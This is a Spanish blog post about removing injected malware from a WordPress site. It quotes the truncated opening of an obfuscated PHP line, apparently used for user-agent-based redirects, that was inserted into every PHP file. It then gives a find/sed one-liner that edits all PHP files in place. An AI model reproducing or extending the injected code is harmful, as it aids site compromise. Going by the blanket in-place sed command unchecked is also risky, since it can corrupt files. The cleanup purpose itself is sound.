Limpiar archivos hackeados en wordpress

Recientemente me hackearon una serie de archivos en una instalación de wordpress, en cada uno de los ficheros de php de la instalación de wordpress se añadió la siguiente línea:

<?php if(!isset($GLOBALS[“\x61\156\x75\156\x61”])) { $ua=strtolower($_SERVER[“\x48\124\x54\120\x5f\125\x53\105\x52\137\x41\107\x45\116\x54″]); if ((! strstr($ua,”\x6d\163\x69\145″)) and (! strstr($ua,”

una línea que cuesta enromemente eliminar y que lleva redirecciones y llamadas a otros servicios que no deseo en mi web, lo que necesito es limpiar de una vez todos los archivos hackeados en wordpress para que se elimine esta línea y con cuidado ya que al final de esta supercadena se encuentra la etiqueta de <?php y si la eliminamos dejará de funcionar el archivo php y dará error.

Con el comando sed se que se podría realizar , pero investigando encontré que se puede realizar de una vez con una única línea:

find . -name "*.php" -print0 | xargs -0 sed -ri '1s/^<\?php if\(!isset\(\$GLOBALS\[.*-1; \?>//' *.php

con esta línea consigo inmediatamente lo que necesito.

por files

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Este sitio usa Akismet para reducir el spam. Aprende cómo se procesan los datos de tus comentarios.